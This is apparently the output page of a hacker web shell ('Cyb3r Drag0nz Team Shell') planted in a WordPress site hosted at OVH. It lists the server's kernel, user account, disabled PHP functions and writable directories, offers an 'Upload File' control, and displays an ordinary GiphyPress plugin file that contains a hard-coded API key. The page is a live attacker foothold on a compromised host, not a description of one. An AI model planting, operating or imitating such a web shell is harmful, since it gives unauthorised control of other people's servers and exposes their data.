Google

Cyb3r Drag0nz Team Shell

Server : Apache
System : Linux webd003.cluster126.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
User : atwiofrxug (73666)
PHP Version : 8.4.10
Disable Functions : _dyuweyrj4,_dyuweyrj4r,dl
Current Directory : /home/atwiofrxug/mylittletelaviv/wp-content/plugins/giphypress/
Directory Status: Writeable | Document Root: Writeable

Upload File







Viewing: /home/atwiofrxug/mylittletelaviv/wp-content/plugins/giphypress/widget.php

<?php

require_once dirname(__FILE__) . '/utils.php';

class GiphyPressPlugin {

  public static $API_KEY = 'G46lZIryTGCUU';
  public static $API_HOST = 'https://api.giphy.com';

  public function __construct() {

  }

  public static function wp_above_version($ver) {
    global $wp_version;
    if (version_compare($wp_version, $ver, '>=')) {
      return true;
    }
    return false;
  }

  public static function giphypress_show_options() {
    //doLog("giphy press show options called");
    if (!current_user_can('manage_options')) {
      wp_die(__('You do not have sufficient permissions to access this page.'));
    }

    echo "<h1>GiphyPress Settings</h1>";
    // TODO - put any plugin specific options in here.

  }

}

Cyb3r Drag0nz Team • Google Edition